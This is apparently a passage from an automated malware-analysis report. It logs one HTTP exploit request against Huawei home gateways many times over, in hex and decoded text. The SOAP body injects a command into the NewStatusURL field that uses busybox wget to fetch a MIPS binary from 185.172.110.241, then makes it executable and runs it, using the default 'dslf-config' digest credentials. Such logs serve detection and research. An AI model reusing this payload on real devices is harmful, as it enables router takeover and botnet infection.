3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 